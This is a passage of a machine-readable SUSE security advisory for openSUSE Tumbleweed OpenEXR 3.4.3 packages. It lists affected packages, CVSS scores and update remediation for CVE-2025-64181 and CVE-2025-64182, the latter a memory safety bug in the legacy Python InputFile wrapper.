            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 4,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-11-18T00:00:00Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2025-64181"
    },
    {
      "cve": "CVE-2025-64182",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-64182"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.2.0 through 3.2.4, 3.3.0 through 3.3.5, and 3.4.0 through 3.4.2, a memory safety bug in the legacy OpenEXR Python adapter (the deprecated OpenEXR.InputFile wrapper) allow crashes and likely code execution when opening attacker-controlled EXR files or when passing crafted Python objects. Integer overflow and unchecked allocation in InputFile.channel() and InputFile.channels() can lead to heap overflow (32 bit) or a NULL deref (64 bit). Versions 3.2.5, 3.3.6, and 3.4.3 contain a patch for the issue.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:openexr-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:openexr-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:openexr-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:openexr-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-64182",
          "url": "https://www.suse.com/security/cve/CVE-2025-64182"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1253234 for CVE-2025-64182",
          "url": "https://bugzilla.suse.com/1253234"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-11-18T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2025-64182"
    },
    {
      "cve": "CVE-2025-64183",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-64183"
        }
      ],
      "notes": [
        {
          "category": "general",
